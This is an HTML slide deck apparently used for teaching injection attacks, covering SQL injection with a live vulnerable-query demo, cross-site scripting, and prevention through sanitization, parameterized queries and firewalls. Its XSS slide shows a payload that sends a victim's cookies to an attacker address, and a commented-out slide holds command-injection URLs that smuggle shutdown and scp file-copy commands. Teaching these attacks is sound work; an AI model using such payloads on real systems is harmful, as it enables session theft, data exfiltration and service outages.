<!doctype html>
<html>
        <head>
                <meta charset="utf-8">
                <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">

                <title>web-security</title>

                <link rel="stylesheet" href="css/reveal.css">
                <link id="theme" rel="stylesheet" href="css/theme/solarized.css">

                <!-- Theme used for syntax highlighting of code -->
                <link rel="stylesheet" href="lib/css/zenburn.css">

                <link href="https://vjs.zencdn.net/7.8.4/video-js.css" rel="stylesheet" />
                <script src="https://vjs.zencdn.net/ie8/1.1.2/videojs-ie8.min.js"></script>
                <script src="https://cdn.jsdelivr.net/npm/vue/dist/vue.js"></script>

                <script>
Vue.directive("highlightjs", {
        deep: true,
        bind: function (el, binding) {
          // on first bind, highlight all targets
          let targets = el.querySelectorAll("code");
          targets.forEach((target) => {
            // if a value is directly assigned to the directive, use this
            // instead of the element content.
            if (binding.value) {
              target.textContent = binding.value;
            }
            hljs.highlightBlock(target);
          });
        },
        componentUpdated: function (el, binding) {
          // after an update, re-fill the content and then highlight
          let targets = el.querySelectorAll("code");
          targets.forEach((target) => {
            if (binding.value) {
              target.textContent = binding.value;
              hljs.highlightBlock(target);
            }
          });
        },
      });
                </script>

                <!-- Printing and PDF exports -->
                <script>
                        var link = document.createElement( 'link' );
                        link.rel = 'stylesheet';
                        link.type = 'text/css';
                        link.href = window.location.search.match( /print-pdf/gi ) ? 'css/print/pdf.css' : 'css/print/paper.css';
                        document.getElementsByTagName( 'head' )[0].appendChild( link );
                </script>
        </head>
        <body>
                <div class="reveal">
                        <div class="slides">

<section>
  <h1>Injection Attacks</h1>
  <p style="float: right; text-align: right; margin-right: 2em">
    Rajesh Sundaram
    <br />
    Mini App Developer
  </p>
</section>


<section>
  <h2>What are Injection Attacks?</h2>
  <ul class="intro-list">
    <li>
      Injection of malicious code in to the network which fetches all the
      information from the database to the attacker
    </li>
    <li class="fragment">
      Number one web application security risk in the OWASP Top 10 2017
    </li>
    <li class="fragment">
      Considered as oldest and most dangerous attacks as this can lead to data
      theft, data loss & full system compromise
    </li>
  </ul>
  <div class="diagram-illustration">
    <img
      class="r-stretch"
      src="https://sectigostore.com/blog/wp-content/uploads/2020/06/sql-injection-attack-breakdown.png"
      alt=""
    />
  </div>
  <style>
    .intro-list li {
      font-size: 0.8em;
    }
  </style>
</section>


<section>
  <h2>Web Attacks</h2>
  <div class="web-attack-container">
    <div class="info" style="display: flex; align-items: center">
      <ul>
        <li>9 out of 10 web applications are vulnerable</li>
        <li>Almost 1/3 of total attacks are injection attacks</li>
      </ul>
    </div>
    <div class="map-container">
      <iframe
        class="map"
        height="400"
        width="500"
        src="https://threatmap.checkpoint.com/"
        frameborder="0"
        allowfullscreen
      ></iframe>
    </div>
  </div>
</section>
<style>
  .web-attack-container {
    display: grid;
    grid-template-columns: 50% 50%;
    grid-gap: 0.4em;
  }
  .web-attack-container .info {
    font-size: 0.8em;
  }
  .web-attack-container .map-container {
    display: flex;
    align-items: center;
    min-height: 400px;
  }
  .web-attack-container .map-container iframe {
    height: 80%;
    min-height: 400px;
  }
</style>


<section>
  <h3>Most Dangerous Injection Attacks</h3>
  <ul>
    <li>SQL Injection</li>
    <li>Cross-Site Scripting</li>
    <!-- <li>Code Injection</li> -->
  </ul>
</section>


<section>
  <section>
    <h2>SQL Injection</h2>
    <ul>
      <li>
        Insertion of malicious SQL statements as user-input
        to attack data-driven applications
      </li>
    </ul>
    <div class="diagram-illustration">
      <img
        class="r-stretch"
        src="https://sectigostore.com/blog/wp-content/uploads/2020/06/sql-injection-attack-breakdown.png"
        alt=""
      />
    </div>
  </section>
  <section>
    <h2>Example</h2>
    <div id="sql-vue-inject-app">
      <fieldset class="login-container">
        <legend>Web Client</legend>
        <label for="uname"><b>Username</b></label>
        <input
          type="text"
          v-model="username"
          placeholder="Enter Username"
          name="uname"
          required
        />

        <label for="psw"><b>Password</b></label>
        <input
          type="password"
          v-model="password"
          placeholder="Enter Password"
          name="psw"
          required
        />
        <button>Login</button>
      </fieldset>
      <div class="backend">
        <fieldset class="backend-query-viewer">
          <legend>Server Logic</legend>
          <pre v-highlightjs="serverCode">
              <code class="js" data-trim contenteditable>
              </code>
            </pre>
        </fieldset>
        <fieldset class="backend-query-viewer">
          <legend>Executed Query</legend>
          <pre v-highlightjs="sqlQuery">
              <code class="sql" data-trim contenteditable>
              </code>
            </pre>
        </fieldset>
      </div>
    </div>
    <script>
      new Vue({
        el: "#sql-vue-inject-app",
        data() {
          return {
            username: "",
            password: "",
          };
        },
        computed: {
          serverCode: function () {
            return `
const username = req.body.username; // ${this.username}
const password = req.body.password; // ${this.password}
await connection.query(
 \`SELECT * FROM Users 
  WHERE username ='\$\{username\}'
  AND password = '\$\{hash(password)\}'\`);
  ........
    `;
          },
          sqlQuery: function () {
            return `
SELECT * FROM Users 
WHERE username = '${this.username}' AND password = '${btoa(this.password)}'
    `;
          },
        },
      });
    </script>
    <style>
      #sql-vue-inject-app .backend-query-viewer {
        font-size: 0.6em;
      }
      #sql-vue-inject-app .backend-query-viewer pre {
        margin: 1em 0px 0px 1em;
      }

      #sql-vue-inject-app {
        justify-content: center;
        align-items: center;
        display: grid;
        grid-template-columns: 25% 60%;
      }

      #sql-vue-inject-app .login-container {
        max-width: 300px;
        padding: 16px;
        font-size: 16px;
        border: 1px solid;
      }
      #sql-vue-inject-app input[type="text"],
      #sql-vue-inject-app input[type="password"] {
        font-size: 14px;
        width: 100%;
        padding: 8px 10px;
        margin: 8px 0;
        display: inline-block;
        border: 1px solid #ccc;
        box-sizing: border-box;
      }
      #sql-vue-inject-app label {
        float: left;
      }

      #sql-vue-inject-app button {
        background-color: #4caf50;
        color: white;
        padding: 14px 20px;
        margin: 8px 0;
        border: none;
        cursor: pointer;
        width: 100%;
      }

      #sql-vue-inject-app button:hover {
        opacity: 0.8;
      }
    </style>
  </section>
  <section>
    <h2>Demo</h2>
    <div style="position: relative; padding-bottom: 56.25%; height: 0">
      <iframe
        src="https://fluvid.com/videos/detail/P5m1dUgRa1ugM7LYn/embed"
        frameborder="0"
        webkitallowfullscreen
        mozallowfullscreen
        allowfullscreen
        style="position: absolute; top: 0; left: 0; width: 100%; height: 100%"
      ></iframe>
    </div>
  </section>
</section>


<section>
  <section>
    <h2>Cross-Site Scripting</h2>
    <ul style="font-size: 0.8em">
      <li>
        Attacker attaches javascript code onto a legitimate website that will
        execute when the victim loads the website
      </li>
    </ul>
    <div class="diagram-illustration">
      <img
        class="r-stretch"
        style="width: 60%"
        src="https://www.cloudflare.com/img/learning/security/threats/cross-site-scripting/xss-attack.png"
        alt=""
      />
    </div>
  </section>
  <section>
    <h2>Example</h2>
    <div style="font-size: 0.8em">
      <pre><code class="html" id="imgXssInjection" data-trim contenteditable></code></pre>
    </div>
    <div class="diagram-illustration">
      <img
        class="r-stretch"
        style="width: 60%"
        src="https://i.stack.imgur.com/ASQbz.png"
        alt=""
      />
    </div>
    <script>
      const injectScript = `<img src=x onerror=this.src='http://192.168.0.1:80/?'+document.cookie;>`;
      document.getElementById("imgXssInjection").innerText = injectScript;
    </script>
  </section>
</section>


<!-- <section>
  <h2>Code Injection</h2>
  <ul>
    <li>
      Attacker sends untrusted user input to an interpreter as part of a command
      or query to run arbitrary shell commands on the web server.
    </li>
  </ul>
  <div style="font-size: 0.6em; display: grid; grid-template-columns: 35% 65%">
    <pre>
      <code class="js" data-trim contenteditable>
    ...
    // check website availability
    app.get('/', async (req, res) {
    await child_process.exec(
    'ping ' + req.query.domain);
    ...
    })
    ...
      </code>
    </pre>
    <div>
      <pre>
        <code class="bash">
curl http://www.ping.com/?domain=google.com
curl http://www.ping.com/?domain=;shutdown
curl http://www.ping.com/?domain=;scp%20-r%20.%20root@315.32.2.1:/home
        </code>
      </pre>
    </div>
  </div>
</section>
 -->


<section style="font-size: 0.8em">
  <section>
    <h2>Prevention</h2>
    <ul>
      <li>Don’t trust any user-supplied input</li>
      <li>
        <span>Proper validation and sanitization</span>
        <pre><code class="js">
// Mount express-sanitizer middleware here
app.use(expressSanitizer());
app.post('/', function(req, res, next) {
  // replace an HTTP posted body property with the sanitized string
  const sanitizedString = req.sanitize(req.body.propertyToSanitize);
  res.send({ sanitized: sanitizedString });
});
        </code></pre>
      </li>
      <li>
        <span> Parametrized queries </span>
        <pre><code class="java">
String sql = "SELECT STUDENT FROM SCHOOL WHERE SCHOOL LIKE ? ";
PreparedStatement prepStmt = conn.prepareStatement(sql);
prepStmt.setString(1, "Waterloo%");
ResultSet rs = prepStmt.executeQuery();
        </code></pre>
      </li>
    </ul>
  </section>
  <section>
    <h2>Prevention</h2>
    <ul>
      <li>
        <span>WAF</span>
        <img
          src="https://avinetworks.com/wp-content/uploads/2018/08/web-application-firewall-simple-diagram_1.jpg"
          alt=""
        />
      </li>
      <li>Regular scanning with web vulnerability scanner</li>
    </ul>
  </section>
</section>


<section>
  <blockquote>
    &ldquo;<b>Technology trust</b><br />
    is a good thing <br /><b>but control</b><br />
    is better one&rdquo;<br />
    <small class="author" style="float: right"> - Stephane Nappo</small>
  </blockquote>
  <div class="thanks">🙏 Thanks</div>
  <style>
    .thanks {
      font-size: 2em !important;
      display: flex;
      justify-content: center;
      width: 100%;
    }
  </style>
</section>


                        </div>
                </div>

                <script src="lib/js/head.min.js"></script>
                <script src="js/reveal.js"></script>

                <script>
                        // More info about config & dependencies:
                        // - https://github.com/hakimel/reveal.js#configuration
                        // - https://github.com/hakimel/reveal.js#dependencies
                        Reveal.initialize({
                                autoPlayMedia: null,
                                autoSlide: 0,
                                autoSlideMethod: null,
                                autoSlideStoppable: true,
                                backgroundTransition: 'fade',
                                center: true,
                                controls: true,
                                controlsBackArrows: 'faded',
                                controlsLayout: 'bottom-right',
                                controlsTutorial: true,
                                defaultTiming: null,
                                dependencies: [
  { src: 'plugin/markdown/marked.js' },
  { src: 'plugin/markdown/markdown.js' },
  { src: 'plugin/notes/notes.js', async: true },
  { src: 'plugin/highlight/highlight.js', async: true, callback: function() { 
    hljs.initHighlightingOnLoad();
     } },
  { src: 'plugin/zoom-js/zoom.js', async: true }
]
,
                                disableLayout: false,
                                display: 'block',
                                embedded: false,
                                focusBodyOnPageVisibilityChange: true,
                                fragmentInURL: true,
                                fragments: true,
                                hashOneBasedIndex: false,
                                height: 700,
                                help: true,
                                hideAddressBar: true,
                                history: true,
                                keyboard: true,
                                keyboardCondition: null,
                                loop: false,
                                margin: 0.04,
                                maxScale: 2,
                                minScale: 0.2,
                                mouseWheel: false,
                                overview: true,
                                parallaxBackgroundHorizontal: null,
                                parallaxBackgroundImage: '',
                                parallaxBackgroundPosition: '',
                                parallaxBackgroundRepeat: '',
                                parallaxBackgroundSize: '',
                                parallaxBackgroundVertical: null,
                                pause: true,
                                pdfMaxPagesPerSlide: Number.POSITIVE_INFINITY,
                                pdfPageHeightOffset: -1,
                                pdfSeparateFragments: true,
                                postMessage: true,
                                postMessageEvents: false,
                                previewLinks: false,
                                progress: true,
                                rollingLinks: false,
                                rtl: false,
                                showNotes: false,
                                showSlideNumber: 'all',
                                shuffle: false,
                                slideNumber: true,
                                touch: true,
                                transition: 'convex',
                                transitionSpeed: 'slow',
                                viewDistance: 3,
                                width: 960,
                                
                        });
                </script>
                <script src="https://vjs.zencdn.net/7.8.4/video.js"></script> 
        </body>
</html>